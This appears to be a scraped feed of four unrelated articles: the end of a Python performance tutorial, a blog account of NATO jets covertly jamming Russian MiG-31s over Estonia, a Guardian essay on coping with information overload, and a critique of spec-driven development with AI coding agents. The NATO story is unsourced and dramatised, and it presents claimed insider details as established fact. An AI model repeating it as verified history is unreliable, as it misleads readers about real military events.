  3. Choose Suggest Refactoring in the menu.
  4. The AI Chat pane then opens with its proposed refactorings. In it, you can:
    • Click Show Diff to compare the original against the proposed code.
    • Or if you prefer, you can select Apply Immediately to skip the diff and apply the suggestion directly.
  5. If you like the suggested changes, click Accept on individual snippets (in the gutter) or Accept All to replace the entire selected fragment.
  6. If you don’t like the suggestions, you can always close the diff or dialog without applying.

def outer():
    def add_pair(a, b):
        return a + b
    result = 0
    for i in range(10000000):
        result = add_pair(result, i)
    return result
start = time.time()
result = outer()
print(f"Local function: {time.time() - start:.4f}s")

def add_pair(a, b):
    return a + b
start = time.time()
result = 0
for i in range(10000000):
    result = add_pair(result, i)
print(f"Global function: {time.time() - start:.4f}s")

Time measured:

  • Local function: ~0.4000s
  • Global function: ~0.4500s

Hack 8: Use itertools for combinatorial operations

When dealing with permutations, combinations, Cartesian products, or other iterator-based tasks, Python’s itertools module provides a suite of highly efficient, C-optimized tools tailored for these use cases.

Functions like product() , permutations() , combinations() , and combinations_with_replacement() generate elements lazily, meaning they don’t store the entire result in your computer’s memory. This allows you to work with large or infinite sequences without the performance or memory penalties of manual implementations.

In addition to being fast, itertools functions are composable and memory-efficient, making them ideal for complex data manipulation, algorithm development, and problem-solving tasks like those found in simulations, search algorithms, or competitive programming. When performance and scalability matter, itertools is a go-to solution.

from itertools import product
items = [1, 2, 3] * 10
start = time.time()
result = list(product(items, repeat=2))
print(f"Itertools: {time.time() - start:.4f}s")

start = time.time()
result = []
for x in items:
    for y in items:
        result.append((x, y))
print(f"Loops: {time.time() - start:.4f}s")

Time measured:

  • itertools : ~0.0005s
  • Loops: ~0.0020s
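
Note that wrapping the result in list() materializes every pair; because itertools generates results lazily, you can also consume the iterator directly and never hold the full result in memory. A minimal sketch (not from the original article) using combinations():

from itertools import combinations

items = list(range(1000))

# combinations() yields the ~500,000 pairs one at a time,
# so the full set of pairs is never stored in memory.
total = 0
for a, b in combinations(items, 2):
    total += a + b
print(total)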

Hack 9: Use bisect for sorted list operations

When working with sorted lists, using linear search or manual insertion logic can be inefficient – especially as the list grows. Python’s bisect module provides fast, efficient tools for maintaining sorted order using binary search.

With functions like bisect_left() , bisect_right() , and insort() , you can perform insertions and searches in O(log n) time, as opposed to the O(n) complexity of a simple scan. This is particularly useful in scenarios like maintaining leaderboards, event timelines, or implementing efficient range queries.

By using bisect , you avoid re-sorting after every change and gain a significant performance boost when working with dynamic, sorted data. It’s a lightweight and powerful tool that brings algorithmic efficiency to common list operations.

import bisect
numbers = sorted(list(range(0, 1000000, 2)))
start = time.time()
bisect.insort(numbers, 75432)
print(f"Bisect: {time.time() - start:.4f}s")

start = time.time()
for i, num in enumerate(numbers):
    if num > 75432:
        numbers.insert(i, 75432)
        break
print(f"Loop: {time.time() - start:.4f}s")

Time measured:

  • bisect : ~0.0001s
  • Loop: ~0.0100s
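
The example above covers insertion; for the search side mentioned earlier, here is a minimal sketch (not from the original article) using bisect_left() for an O(log n) membership test on a sorted list:

import bisect

numbers = list(range(0, 1000000, 2))  # sorted list of even numbers

def contains_sorted(sorted_list, value):
    # Binary-search membership test for a sorted list.
    i = bisect.bisect_left(sorted_list, value)
    return i < len(sorted_list) and sorted_list[i] == value

print(contains_sorted(numbers, 75432))  # True: present
print(contains_sorted(numbers, 75433))  # False: absent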

Hack 10: Avoid repeated function calls in loops

Calling the same function multiple times inside a loop – especially if the function is expensive or produces the same result each time – can lead to unnecessary overhead. Even relatively fast functions can accumulate significant cost when called repeatedly in large loops.

To optimize, compute the result once outside the loop and store it in a local variable. This reduces function call overhead and improves runtime efficiency, particularly in performance-critical sections of code.

This technique is simple but effective. It not only speeds up execution but also enhances code clarity by signaling that the value is constant within the loop’s context. Caching function results is one of the easiest ways to eliminate redundant computation and make your code more efficient.

def expensive_operation():
    time.sleep(0.001)
    return 42
start = time.time()
cached_value = expensive_operation()
result = 0
for i in range(1000):
    result += cached_value
print(f"Cached: {time.time() - start:.4f}s")

start = time.time()
result = 0
for i in range(1000):
    result += expensive_operation()
print(f"Repeated: {time.time() - start:.4f}s")

Time measured:

  • Cached: ~0.0010s
  • Repeated: ~1.0000s
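
When a function's result depends only on its arguments, the standard library can do the caching for you; a minimal sketch (not part of the original benchmark) applying functools.lru_cache to the zero-argument function above:

import time
from functools import lru_cache

@lru_cache(maxsize=None)
def expensive_operation():
    time.sleep(0.001)  # simulated expensive work; runs only on the first call
    return 42

start = time.time()
result = sum(expensive_operation() for _ in range(1000))
print(f"lru_cache: {time.time() - start:.4f}s")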

In summary

From leveraging the inherent efficiency of Python’s built-in functions and high-performance libraries such as NumPy to employing memory-conscious techniques with __slots__ and lazy itertools iterators, these ten Python performance strategies provide a comprehensive set of tools for enhancing execution speed.

The methods explored include using sets for rapid membership checks, avoiding unnecessary data copies and exception-handling overhead, pre-allocating memory, and preferring the optimized functions in the math module over operator-based equivalents.

Specialized modules such as itertools , bisect , and collections further streamline complex tasks, while adherence to best practices – such as minimizing the use of global variables, pre-allocating memory, and implementing caching – ensures lean, efficient code execution. Empirical benchmarks demonstrate that even minor adjustments can yield significant time savings in large-scale operations, reinforcing the principle that effective optimization does not necessitate a complete code rewrite.

Whether refining a standalone script or scaling a production-level application, these techniques, when applied judiciously, can significantly enhance performance while conserving system resources. Ultimately, the most effective optimizations strike a balance between speed and clarity.

About the author

Dido Grigorov

Dido Grigorov

Dido is a seasoned Deep Learning Engineer and Python programmer with an impressive 17 years of experience in the field. He is currently pursuing advanced studies at the prestigious Stanford University, where he is enrolled in a cutting-edge AI program, led by renowned experts such as Andrew Ng, Christopher Manning, Fei-Fei Li and Chelsea Finn, providing Dido with unparalleled insights and mentorship.

Dido’s passion for Artificial Intelligence is evident in his dedication to both work and experimentation. Over the years, he has developed a deep expertise in designing, implementing, and optimizing machine learning models. His proficiency in Python has enabled him to tackle complex problems and contribute to innovative AI solutions across various domains.


NATO Ended Russia's Estonian Air Incursions

Hacker News
themilitaryanalyst.com
2025-11-15 09:14:34
Comments...
Original Article

On 19 September 2025, between 0958 and 1011hrs, Russia carried out another in a series of air incursions into Estonian airspace. They were technically minor infractions, but the last one lasted almost 12 minutes, and in the context of tensions with NATO – largely created by Russia itself – it was just another dangerous move in the never-ending game of Baltic chess.

Prior air incursions

This is why another similar move hasn’t happened, and why Russia will think twice before it does so again.

For decades the process of a NATO air interception has followed the usual procedure. In my lifetime I’ve witnessed or been made aware of hundreds, and even flown on one in the rear seat of a Tornado. It’s a thrilling experience, pulling up next to a Tu-22M (NATO: Tu-26 Backfire) in the south Norwegian Sea.

Ground or air based radars see the enemy coming, aircraft are scrambled and certainly in the Cold War era and until recently, the aircraft doing the intercepting would have been pinging their radars looking for the target. The NATO aircraft would arrive, escort the Russians out of their airspace or just sit next to them if they were in international space. The point was always to make it absolutely clear an interception would always happen. We would never back down from them and they always knew we would come.

At the same time the Russians would test the time to intercept and note which units had been sent to do the intercepting. It was how the game has always been played for the best part of 60 years.

Previous Estonia incursions had not been deterred, and NATO command was well aware that the Russians were not convinced by playing the game the old-fashioned way. It was not stopping them crossing into Estonian air space, and they had the advantage of a massive area of air space on their side, from which they could change direction at any time, conduct an incursion and leave – most likely before NATO aircraft could actually get to them. The Russians were using every opportunity to press home their local superiority and make sure NATO knew it.

Their preferred aircraft for these operations is not so much a fighter in the classic sense, but a long range interceptor, The Mig-31 Foxhound. It’s incredibly fast in a straight line at Mach 2.8 – leaving most western aircraft standing – has a combat radius of around 1,900 miles (3,060Km) and can be in and out of an incursion zone in a couple of minutes, at heights as far up as 82,000ft (25,000m).

The Mig-31 Foxhound Interceptor

NATO knew this. It also knew that the Russian command system is nowhere near as integrated as NATO’s, and Mig-31 pilots rely on ground control for instructions on almost everything. It was clear these incursions were ordered and deliberate. The time had come to change the rules of the game and show the Russians that whatever they thought those rules were, NATO had changed them. Russia was about to find out once and for all how dramatically and effectively things have moved on.

NATO had made a military and political choice to reveal to the Russians that they were not messing around any more, that putting up with these incursions was not going to be sustainable, and that it was time to demonstrate Western superiority. Once you read what happened and remember the calls for shooting down any future incursion that followed, you’ll understand why the Russians haven’t done it again. This is a remarkable tale of NATO pushing back and Russia actually getting the message.

Italian Air Force F-35’s played a key but near silent role, unseen, unhindered, demonstrating true air superiority.

The Mig-31 uses a very powerful phased array radar, designed to look ahead for air targets, called the SBI-16 Zaslon. Later upgrades have referred to variants like Zaslon-M, enhancing detection ranges and track-while-scan functionality. These radars enable simultaneous tracking of multiple targets and coordination with other aircraft and ground systems. However, they are unable to ‘look down’ and operate only in the air-to-air domain. Coupled to long-range air-to-air missiles, the Foxhound represents the ideal long-range interceptor platform – provided it can see the target, of course.

The whole concept of the long-range interceptor is a little bit 1950s, derived from the days of the dominant strategic bomber as a nuclear weapons delivery platform. Long-range interceptors – the most famous being the Su-15 Flagon, which shot down Korean Air 007 on September 1st 1983, thinking it was a US RC-135 spy plane in Russian air space – are a Russian ‘thing’. The follow-on Mig-25 and now the Mig-31 are still intended to fulfill a similar role, though against what is hard to ascertain in the 21st Century.

The Mig-31 may be capable, but it’s really from a different era, where straight line speed has little meaning and despite its powerful radar, it’s not really suited to modern air combat. Yet the Russians see it as perfectly suited to simply rattling NATO’s cage, and if that’s all it does, they’re happy.

In any event the Mig-31 Foxhound is an ideal way to get in and get out in a deliberate incursion role like this.

NATO was monitoring the Baltic States air space from ground radars and from a Geilenkirchen-based AWACS several hundred kilometers back near the German/Polish border. It identified the three Russian Mig-31’s well before they entered Estonian airspace.

As soon as the AWACS spotted the aircraft, they informed NATO at the Combined Air Operations Centre in Uedem, Germany, right on the border with the Netherlands, which ordered two Italian F-35’s to take off from their Estonian air base at Amari on the coast. They took off under complete operational silence. This was done through NATO secure encryption, and the F-35’s were operating without radars active and without alerting the Russians. The F-35’s, however, could see exactly where the Russians were and what they were doing via NATO Datalink-16 shared from the AWACS. No need to use their own radars, which made them effectively invisible to the Zaslon radar on the Foxhounds.

Meanwhile a pair of Swedish Gripens on patrol over the Baltic, equipped with Meteor missiles, are boxing in the Russians – and again, the Russians have no idea. The Gripens know what the F-35’s know and vice versa, all shared with the AWACS and NATO command.

Gripen E with Meteor and Arexis played a key role

Meanwhile the Foxhounds are doing what they always do: testing response times, mapping radar coverage gaps, listening for comms and generally looking for weakness in the local air defence system. Yet that’s just part of what they aim for, because the real point is to get in and get out and make it so normal an event that it’s simply not worth intercepting every single time. It’s about enforcing their right to roam where they want and NATO getting fed up with stopping them. They have never understood that we don’t tire and we are always waiting for them.

This time there would be no polite escort, no gentlemanly wave from the cockpit. NATO was about to demonstrate overwhelming capability without firing a shot.

Italian Air Force F-35’s of the NATO Air Policing Mission were critical components in the operation. Their stealth was crucial. A silent but vital victory.

The Russians were also being watched by a US RQ-4 Global Hawk over the Baltic, and that was backed up further by NATO signals intelligence supplied by a ground surveillance satellite. It was the satellite that first knew the Russians were on the move.

The incursion took place at a favorite spot for the Russians, Vaindloo island, just 28km from Russian air space. The Russians were bemused: no NATO aircraft appeared.

Meanwhile the F-35’s are using their AN/APG-81 Radars in passive mode, watching the Russians and relaying high band data to NATO and the Gripens. Everything the Russians do is being recorded and every transmission and signature unique to each aircraft logged. This data is permanently available to NATO for future use.

The Russians don’t know what’s about to hit them. Once the above data is known, the electronic warfare systems on the NATO aircraft know what to jam, when to jam it and how to maintain that jamming until they have completed their mission.

NATO AWACS flying out of Geilenkirchen – still doing their job guarding NATO skies.

Meanwhile the Gripens are closing but not using active radar, reliant on the data provided by NATO from all of its sources, primarily through the F-35’s and AWACS. Gripen is fitted with a Leonardo Skyward-G IRST and Saab’s Arexis EW suite. The IRST detects and Arexis can deliver the response – an even more comprehensive response when it knows exactly what it’s up against, using data from the F-35’s and their own passive sensors.

If this was a hostile scenario, the Swedes could have used their 200km-range, ramjet-powered Meteor air-to-air missiles, which the Russians wouldn’t even have known were coming. The missile is designed to gain a lock on the target without a radar spike to identify it as a threat to the Russian aircraft. Combined with what was about to happen, it demonstrates to the Russians a staggering level of advancement they have never before encountered. Once they got back to their base and were debriefed, they will have known the immense danger they were potentially in if this had been a combat scenario.

Now it is true that NATO policy on interception policing requires physical eyeballing of the hostiles, so to let that happen with maximum impact, the F-35’s had to get close enough to see the Foxhounds. The Gripens unleashed their EW using digital radio frequency memory jamming, creating false targets and rendering the Zaslon-M full of rubbish data. The Russian cockpits would have lit up like a Christmas tree, making no sense whatever of the information the Zaslon was providing. The Arexis cut off the radio between the aircraft and their ground base. The Foxhounds were in effect being rendered useless. They could see nothing and communicate with nobody.

The F-35’s closed from behind – unseen – and identified the aircraft using their optical scanner before pulling away. The Gripens’ commander then used the emergency radio frequency to tell the Russians, “You are under our control. Return to Russian air space immediately”.

At first confused, the Russian pilots turned one after another and departed Estonian air space, back into international space, and continued their journey to Kaliningrad. Who would like to have been in the briefing room after that escapade?

At no point did the Russians see a NATO aircraft. They were made absolutely aware that none of their missile and radar systems were operating normally and they were powerless to request orders from their command. Yet clearly all three pilots knew they’d been completely outmatched and effectively crippled by the NATO response. And the Russian air command knew it too. They were utterly outclassed, boxed into a kill zone from which there was no getting away, and they couldn’t even see the aircraft responsible on radar, let alone visually.

NATO demonstrated complete command of the air and a transformed digital data backbone, a networked system drawing on multiple assets. The demonstration was so complete that the Russians got the message, especially when it was combined with NATO making it quite clear that shooting down Russian aircraft, should they do this again, wasn’t just a statement of intent; it was backed up with a clear demonstration that it could be done. It cannot be a coincidence that it hasn’t happened since.

I’m going to be honest and say I was thrilled when I was shown how this was done: genuinely excited at how far things have progressed, and at the same time struck by how little credit NATO, its organizations and its members get for having quietly kept working to ensure the peace while staying on top of the future of air combat.

I was equally struck by the fact that we don’t see what happens behind the scenes often enough. It was made public that the Russians had been told, informally, that the threat of a shoot-down if they carry on with these provocations is now very real and not just idle words. It was backed up with the very real message that NATO could achieve this and they would barely even know about it. All Russia has to do is ask its Foxhound pilots.

Russia understands only strength. NATO demonstrated it has the will and the capability. Quod erat demonstrandum, Vladimir.

The Analyst

militaryanalyst.bsky.social

Don’t argue with strangers… and 11 more rules to survive the information crisis

Guardian
www.theguardian.com
2025-11-15 09:00:05
Feeling overwhelmed by divisive opinions, endless rows and unreliable facts? Here’s how to weather the data storm We all live in history. A lot of the problems that face us, and the opportunities that present themselves, are defined not by our own choices or even the specific place or government we’...
Original Article

We all live in history. A lot of the problems that face us, and the opportunities that present themselves, are defined not by our own choices or even the specific place or government we’re living under, but by the particular epoch of human events that our lives happen to coincide with.

The Industrial Revolution, for example, presented opportunities for certain kinds of business success – it made some people very rich while others were exploited. If you’d known that was the name of your era, it would have given you a clue about what kinds of events to prepare for. So I’m suggesting a name for the era we’re living through: the Information Crisis.

It’s not a single moment; it’s an epoch – we’re in the middle of it already and it is going to continue for the rest of our lives. And I’d argue that this is the third great information crisis human beings have gone through: following the invention of writing and the Gutenberg printing press, we are now witnessing a crisis caused by digital communications technology. These prolonged crises aren’t just neutral technological improvements; they change us psychologically and socially in profound ways that cannot be reversed.

Naomi Alderman. Photograph: Phil Fisk/The Guardian

What we can see from the last two information crises is that they involve enormous leaps forward in knowledge and understanding, but also a period of intense instability. Following the invention of writing, the world was filled with new, beautiful ideas and new moralities. And there were also new ways to misunderstand each other: the possibility of misreading someone entered the world, as did the possibility of warfare motivated by different interpretations of texts. After the invention of the printing press came the Enlightenment, an explosion of new scientific knowledge and discovery. But before that period, Europe had plunged into the Reformation, which led to the destruction of statues and other artworks and many institutions that had been working at least adequately until then. And, to get to the heart of the matter, the Reformation in Europe meant a lot of people got burned at the stake, or killed in other terrible ways.

I’m not just talking about literal “burning at the stake”, I’m using it as a shorthand for the things people end up doing in the throes of a doctrinal dispute that are completely against the values they would otherwise claim to hold. They are things that involve turning a living, breathing person into a symbol, something that can be treated with extreme cruelty to make a point. When I talk about “burning at the stake” I don’t mean criticising someone’s views in mature debate or protesting against government policies. I mean the things that demean you as a human being if you do them to others. I mean the point when the desire to just win an argument turns you into someone who goes against all your other values. There is never a good enough reason to burn someone at the stake.

I think the following is incontestable: the only way to get rid of all opinions that are different from yours is by carrying out unthinkable human rights atrocities. (And this doesn’t actually work: there are still, in fact, both Catholics and Protestants.)

We can already see how this type of thing becomes more common during an information crisis because we’re now in another one. We’re overloaded and overwhelmed by information. We don’t have the social and informational structures in place yet to manage it. My suggestion is that this enormous information wave makes us anxious and angry.

How? All this information introduces us to all the things we don’t know, all the ways in which we’re not experts. We might end up expressing an idea online that we’ve heard many times in our social circle only to be jumped on by 50 people who know more and tell us that our ideas are stupid, old-fashioned and even prejudiced. If this ever happens to you, it might make you feel profoundly unsettled, frightened, out of touch. That might be a good thing. It’s also an emotionally destabilising thing. It works the other way around, too. When we can see everyone else’s opinions, it turns out that someone we really liked may hold an idea that we find stupid, old-fashioned or even prejudiced. It’s the “I used to like Uncle Bob until I saw his posts on Facebook” syndrome. We’re left wondering who we can trust and whether we’re actually surrounded by upsetting idiots. All this can leave us feeling isolated and misunderstood, unsupported, frightened, worried and angry.

Well, that’s probably very much how it felt in Reformation Europe to find out that your next-door neighbour had a very different idea from you about whether the bread and wine of the sacrament were really the body and blood of Christ.

Which is to say: sadly we can expect this to get worse before it gets better. But there are tools and techniques we can use in the current information crisis. There are ways we can be better equipped to deal with the era we find ourselves in.

Illustration: Tim Alexander/The Guardian

1 Find a fact-checker you trust

Just as after the print revolution in early modern Europe, it is now massively easier to access scientific information. In a few seconds I can find a video clearly explaining particle physics, chemical bonds or how vaccines work. And at the same time, it is also extremely easy to find very plausible-looking but completely false information about how vaccines are actually terrible, suggesting solutions that I really don’t even want to write down here.

But unlike people living through the print revolution, we have sophisticated and trusted information-dispersal networks that are still fairly robust. The BBC has a good fact-checking service. Snopes and PolitiFact are good. There are others, and it’s worth getting familiar with them. Fact-checking is a specialised skill, though, and it is becoming more challenging as the fakes get ever more convincing.

Goodness knows, I have sometimes shared information on social media that turned out to be false. It’s very embarrassing, and I feel the urge every time to double down on my mistake and claim that there is some way in which it sort of is true even though it’s definitely not.

These days, I try to notice how something I want to share on social media is making me feel. If I have a very strong feeling of any type, I use that as a cue to slow down and check my facts. It could be a strong gleeful feeling of: “Oh, this is rich.” Like a tweet I saw recently claiming to be by Donald Trump from a few years ago, saying that if the Dow drops 1,000 points in a day, the president should be impeached. “Oh, this is rich,” I thought to myself. Of course, it’s fake. Or if I feel “Oh God, that’s dreadful, what those people are doing”, that’s also a good sign it might be fake. If it feels too perfectly tailored to me, if it presses my buttons, if it precisely tickles me where I like to be tickled or hurts me where I am vulnerable to being hurt, that’s a sign to check the facts.

3 Resist the urge to shame others online

We’re going to need some new social norms to survive this crisis. Getting into the habit of pausing online whenever you feel a strong emotion and a desire to repost is one new norm to learn ourselves, and teach to children. Another is how to behave when you see someone sharing something you believe to be false. Don’t embarrass them in public. It’s going to happen to you one day, too. Think about how you’d like that person to approach you. A private note, where you’re on their side. It is extremely easy to alienate people via text communication because of all the oral-culture things that are missing from text. “Argh, that made me laugh so much but I don’t think it’s true?” Probably one of the ways that we get through this is by trying not to pointlessly alienate the other humans.

4 Give institutions the benefit of the doubt

Institutions that are sources of basically truthful information are going to be particularly vulnerable when, inevitably, they do get something wrong. There is no such thing as an information system that never gets anything wrong. What we’re looking for is a rapid acknowledgment of the problem, lack of defensiveness, curiosity about how it happened, a focus on systems and not individuals as the way to make sure it doesn’t happen like that again. That’s the ideal.

Even with the ideal system, in an information crisis there will be plenty of people willing to tear down a good-faith truth-seeking organisation over errors, who will use an error or a bad member of that organisation as evidence that nothing from that source can be trusted.

So, which institutions are we being tempted to condemn root-and-branch because of some mistakes and abuses? What large, trying-to-be-helpful-but-sometimes-failing associations would various rulers like to break up and destroy because they represent alternative sources of authority to their own narrative, and also there’s money to be made?

Illustration: Tim Alexander/The Guardian

5 Try not to ‘hate read’

The internet allows every person to access precisely the opinions that most please or enrage them – being enraged is a particular form of being pleased, actually. Finding things on the internet to “hate read” is a way of feeling great about yourself, because you’re not as stupid and wrong as those other people. The internet allows and encourages us to either find opinions that we wildly, enthusiastically agree with or conversely the most ridiculous and objectionable and stupid forms of the views on the other side of any issue.

In every information crisis, there is a tendency to cut ourselves off and look not at the community around us but at the particular information that makes us feel comfortable and right. What we lose via giving in to that tendency is shared reality. That is, a reality we all consent to. Once you’ve lost that, it’s easy to dehumanise others, to start to believe that people who disagree with you aren’t really people at all.

6 Recognise humanity

This is about not treating people as symbols. About the sense that we are not surrounded by cretinous, vicious imbeciles but mostly by careful, thoughtful people who may disagree with us but usually have good reasons for doing so and with whom we could have a reasonably civilised conversation and find many points on which we do agree. I know that saying this already makes me sound like a utopian. I know that it feels as if we probably are surrounded by cretinous, vicious imbeciles a lot of the time. That’s because we’re already right in the middle of an information crisis.

Illustration: Tim Alexander/The Guardian

7 Ignore the opinions of others

If you agree that at least some of the reason that conversation and debate feel so fraught right now is because of our new communication technologies, maybe that helps with taking a step back, not immediately shouting angrily at someone who disagrees with you, online or in real life. Having thought about this a lot, I increasingly take everyone’s emotions seriously, and treat very few people’s opinions seriously. Everyone has an opinion. Unless the person is an expert it’s a mistake to treat their opinion as very important.

8 Use your smartphone judiciously

A smartphone designed by people who care about your wellbeing wouldn’t be asking you to log your mental health with it – don’t do that, really really don’t do that – or even give little passive-aggressive screentime notifications. A smartphone designed by people who care about your wellbeing would prompt you to choose apps to disable after a certain point in the evening, would ask to be turned off for a certain number of hours in the day. It would presume that in general your life is better if you are not spending all day looking at a device, and try to facilitate that. As smartphones don’t do that, we need to treat them with caution. Or even get rid of them; a lot of people are doing that.

Likewise, in an ideal world, social media apps would make it extremely easy not to see content that you didn’t want to see. It would be simple to “whitelist” accounts, topics, video channels, types of content. That is to say, if social media apps were designed with public service in mind, it would be straightforward to tell them, for example, “I only want to see my friends’ pictures of their family, their pets, their recipes, their updates about their career” or whatever it is that you want to see, without having to confront their political opinions. We are living through a time when we are going to be winding each other up a lot. It is all right to want to preserve relationships with family members and friends by only seeing their politics when you choose to engage with it.

And see people in person. If we rely on technology for human connection over in-person interactions, it will leave us feeling more lonely. If you’re feeling more isolated than you were just a few years ago, technology might be the reason. Start by understanding that loneliness isn’t just something that’s happening to you because you’ve done something wrong; it’s a feature of the historical era we’re living through. Make an arrangement to see someone, in person. Your friends would like to hear from you.

Illustration: Tim Alexander/The Guardian

10 Don’t cut children off altogether

There are some online services that allow whitelisting for the children’s version but not for the grown-up one. This in itself is terrible for adults and for children. It creates a cliff-edge where either you’re – let’s say – under 13 and you can only see a few child-focused things on the internet, or suddenly you’re 13 and you get the full firehose of internet horror straight in the face. It means childhood is more denuded of opportunities for entertainment and culture – if everything is accessed via a parent’s smartphone then how do children play music for themselves, or browse radio stations? And it means that there are no helpful on-ramps where parents can slowly decide over the years which more adult-oriented content they can tell their child is ready for. “Protecting the children” is a terrible framing for this. We all need technology that at least allows us the option to take care of ourselves.

11 Campaign for better laws

Although these problems would happen to some extent without technology companies, it is clear that many tech companies now are exacerbating them. We need laws that put us in charge of our own smartphones and our own social media, that mean that we can say exactly what we want to see on them and when. We deserve smartphones and social media that protect our wellbeing and that of our children – countries need to work together on new laws to force the tech companies to do this.

12 Avoid pointless arguments

These days, on Bluesky, I have the words “not getting into pointless arguments on the internet is an act of revolution” in my profile. It keeps me honest. Sometimes I feel tempted to get into a pointless argument. Sometimes someone else has to say, “I thought you didn’t believe in doing this”. And I stand back and go, “Oh yes, arse, I haven’t lived according to my own values here”.

Here’s a rule I have developed for myself: never talk about a culture-war topic with anyone who only wants to talk to you about that topic. These conversations can only be helpful if they happen as part of a relationship. If you’re going in cold on a very hard topic, you will not be able to experience each other as people, only as opinions or symbols.

Ultimately, don’t let the worst “the other side” has done become the new low bar for your own behaviour. Don’t treat people as symbols. Consider the possibility that where reasonable people disagree there may be some useful truth on both sides, even if it’s only the truth of – as we say these days – “lived experience”. Don’t try to get anyone fired today. Don’t insult or berate someone today. Don’t trawl through someone’s social media going back decades to dredge up the worst thing they’ve ever said, today. Don’t, fundamentally, burn anyone at the stake today.

Spec-Driven Development: The Waterfall Strikes Back

Hacker News
marmelab.com
2025-11-15 07:48:23
Comments...
Original Article

Spec-Driven Development (SDD) revives the old idea of heavy documentation before coding — an echo of the Waterfall era. While it promises structure for AI-driven programming, it risks burying agility under layers of Markdown. This post explores why a more iterative, natural-language approach may better fit modern development.

The Rise of Specification

Coding assistants are intimidating: instead of an IDE full of familiar menus and buttons, developers are left with a simple chat input. How can we ensure that the code is correct with so little guidance?

Before and after

To help people write good software with coding assistants, the open-source community designed a clever way to guide a coding agent. Based on an initial prompt and a few instructions, an LLM generates product specifications, an implementation plan, and a detailed list of tasks. Each document depends on the previous one, and users can edit the documents to refine the spec.

Spec-Driven-Development

Eventually, these documents are handed over to a coding agent (Claude Code, Cursor, Copilot, you name it). The agent, now properly guided, should write solid code that satisfies the business requirements.

This approach is called Spec-Driven Development (SDD), and several toolkits can get you started, including GitHub’s spec-kit, Kiro, and Tessl.

If you want a comparison of these tools, I recommend the excellent article Understanding Spec-Driven-Development: Kiro, spec-kit, and Tessl by Birgitta Böckeler.

The Markdown Awakens

How does a spec look? It’s essentially a bunch of Markdown files. Here’s an example using GitHub’s spec-kit, where a developer wanted to display the current date on a time-tracking app, resulting in 8 files and 1,300 lines of text:

Spec-Kit generated spec for Frequentito
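The screenshot isn’t reproduced here, but to give a sense of the output, a spec-kit run for a small feature typically generates a tree along these lines (file names are indicative, not taken from the example above):

specs/001-display-current-date/
├── spec.md          # user scenarios and functional requirements
├── plan.md          # technical approach and architecture notes
├── research.md      # decisions and alternatives considered
├── data-model.md    # entities and fields touched by the feature
├── contracts/       # API or interface contracts
├── quickstart.md    # how to run and verify the feature
└── tasks.md         # ordered implementation checklist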

Here’s another example using Kiro for a small feature (adding a “referred by” field to contacts in Atomic CRM):

Requirements.md - Design.md - Tasks.md

At first glance, these documents look relevant. But the devil is in the details. Once you start using SDD, a few shortcomings become clear:

  • Context Blindness: Like coding agents, SDD agents discover context via text search and file navigation. They often miss existing functions that need updates, so reviews by functional and technical experts are still required.
  • Markdown Madness: SDD produces too much text, especially in the design phase. Developers spend most of their time reading long Markdown files, hunting for basic mistakes hidden in overly verbose, expert-sounding prose. It’s exhausting.
  • Systematic Bureaucracy: The three-step design process is excessive for most cases. Specs contain many repetitions, imaginary corner cases, and overkill refinements. It feels like they were written by a picky clerk.
  • Faux Agile: SDD toolkits generate what they call “User Stories,” but they often misuse the term (e.g. “As a system administrator, I want the referred by relationship to be stored in the database” is not a user story). It doesn’t cause bugs, but it’s distracting.
  • Double Code Review: The technical specification already contains code. Developers must review this code before running it, and since there will still be bugs, they’ll need to review the final implementation too. As a result, review time doubles.
  • False Sense of Security: The SDD methodology is meant to keep the coding agent on track, but in practice, agents don’t always follow the spec. In the example above, the agent marked the “verify implementation” task as done without writing a single unit test—it wrote manual testing instructions instead.
  • Diminishing Returns: SDD shines when starting a new project from scratch, but as the application grows, the specs miss the point more often and slow development. For large existing codebases, SDD is mostly unusable.

Most coding agents already have a plan mode and a task list. In most cases, SDD adds little benefit. Sometimes, it even increases the cost of feature development.

To be fair, SDD helps agents stay on task and occasionally spots corner cases developers might miss. But the trade-off (spending 80% of your time reading instead of thinking) is, in my opinion, not worth it.

Revenge of the Project Manager

Maybe SDD doesn’t help much today because the toolkits are still young and the document prompts need refinement. If that’s the case, we just need to wait a few months until they improve.

But my personal opinion is that SDD is a step in the wrong direction. It tries to solve the wrong problem:

“How do we remove developers from software development?”

It does so by replacing developers with coding agents and guarding those agents with meticulous planning.

In that sense, SDD reminds me of the Waterfall model, which required massive documentation before coding so that developers could simply translate specifications into code.

Waterfall model

But developers haven’t been mere executors for a long time, and Big Design Up Front has proven to fail most of the time because it piles up hypotheses. Software development is fundamentally a non-deterministic process, so planning doesn’t eliminate uncertainty (see the classic No Silver Bullet paper).

Also, who is SDD really for? You must be a business analyst to catch errors during the requirements phase, and a developer to catch errors during design. As such, it doesn’t solve the problem it claims to address (removing developers), and it can only be used by the rare individuals who master both trades. SDD repeats the same mistake as No Code tools, which promise a “no developer” experience but actually require developers to use them.

A New Hope

Agile methodologies solved the problem of non-deterministic development by trading predictability for adaptability. I believe they show us a path where coding agents can help us build reliable software, without drowning in Markdown.

Give a coding agent a simple enough problem, and it won’t go off the rails. Instead of translating complex requirements into complex design documents, we should split complex requirements into multiple simple ones.

I’ve successfully used coding agents to build fairly complex software without ever looking at the code, by following a simple approach inspired by the Lean Startup methodology:

  1. Identify the next most risky assumption in the product.
  2. Design the simplest experiment to test it.
  3. Develop that experiment. If it fails, go back to #2. Otherwise, repeat starting from #1.

Here’s an example: this 3D sculpting tool with adaptive mesh, which I built with Claude Code in about 10 hours.

I didn’t write any spec. I just added small features one by one, correcting the software when the agent misunderstood me or when my own idea didn’t work well. You can see my instructions in the coding session logs: they’re often short and vague, and sometimes lead to dead ends, but that’s fine. When implementing simple ideas is cheap, building in small increments is the fastest way to converge toward a good product.

Agile methodologies freed us from the bureaucracy of waterfall. They showed that close collaboration between product managers and developers eliminates the need for design documents. Coding agents supercharge Agile, because we can literally write the product backlog and see it being built in real time—no mockups needed!

This approach has one drawback compared to Spec-Driven Development: it doesn’t have a name. “Vibe coding” sounds dismissive, so let’s call it Natural Language Development.

I do have one frustration, though: coding agents use text, not visuals. Sometimes I want to point to a specific zone, but browser automation tools aren’t good enough (I’m looking at you, Playwright MCP Server). So if we need new tools to make coding agents more powerful, I think the focus should be on richer visual interactions.

Conclusion

Agile methodologies killed the specification document long ago. Do we really need to bring it back from the dead?

Spec-Driven Development seems born from the minds of CS graduates who know their project management textbooks by heart and dream of removing developers from the loop. I think it’s a missed opportunity to use coding agents to empower a new breed of developers, those who use natural language and build software iteratively.

